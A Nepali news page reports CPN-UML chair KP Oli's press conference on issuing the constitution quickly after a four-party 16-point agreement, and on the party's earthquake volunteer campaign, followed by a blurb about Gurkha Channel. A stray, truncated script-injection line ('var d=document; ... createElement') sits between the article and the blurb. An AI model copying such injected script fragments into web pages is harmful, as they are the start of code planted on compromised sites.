एमाले पत्रकार सम्मेलन

admin Avatar

नेकपा एमालेका अध्यक्ष केपी ओलीले ’सुपर फास्ट ट्रयाक’बाट संविधान जारी हुने बताउनुभएको छ। मंगलबार पार्टी मुख्यालय बल्खुमा आयोजित पत्रकार सम्मेलनमा अध्यक्ष ओलीले दलहरुबीच सोमबार राति भएको सहमतिले संविधान निर्माणको बाटो खुलेको भन्दै ’सुपर फास्ट ट्रयाक’बाट संविधान जारी हुने बताउनुभएको हो। संविधानसभाले प्रक्रियामार्फत चाँडै संविधान जारी गर्ने उहाको भनाई छ। अध्यक्ष ओलीले कतिपयलाई एमालेले अडान छोडेको जस्तो लागेको हुन सक्ने भन्दै एमालेले विगतदेखि उठाउँदै आएका मुद्दा नछोडेको दाबी गर्नुभयो। उहाले विधिको साशन, लोकतान्त्रिक पद्धतिलगायतका विषयमा एमालेले आफ्नो अडान नछोड्ने स्पस्ट पार्नुभयो। ओलीले सत्ता, सरकार र नेतृत्व गौण विषय भएको भन्दै ओलीले संविधान निर्माण प्रमुख कुरा भएको धारणा पनि राख्नुभयो।

ओलीले चार दलबीच भएको १६ बुँदे सहमतिबाट कसैको जित र कसैको हार नभएको समेत बताउनुभयो। भूकम्पपछि स्वयंसेवीहरुले गरेको कार्यप्रगतिबारे जानकारी दिन बल्खुमा मंगलवार आयोजित पत्रकार सम्मेलनमा एमाललेले दलहरुबीचको उक्त सहमतिले स्वयंसेवक परिचालन अभियानलाई थप उत्साहित बनाएको जनाएको छ। स्वयंसेवक परिचालन अभियानअन्तर्गत एमालेले आगामी असार ४ देखि ६ गतेसम्म तीन दिन सबै पार्टी सदस्यहरुले आफ्नो क्षेत्रमा अनिवार्य श्रम गर्ने भएको छ।

var d=document;var s=d.createElement(‘script’);

About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search
Cateegories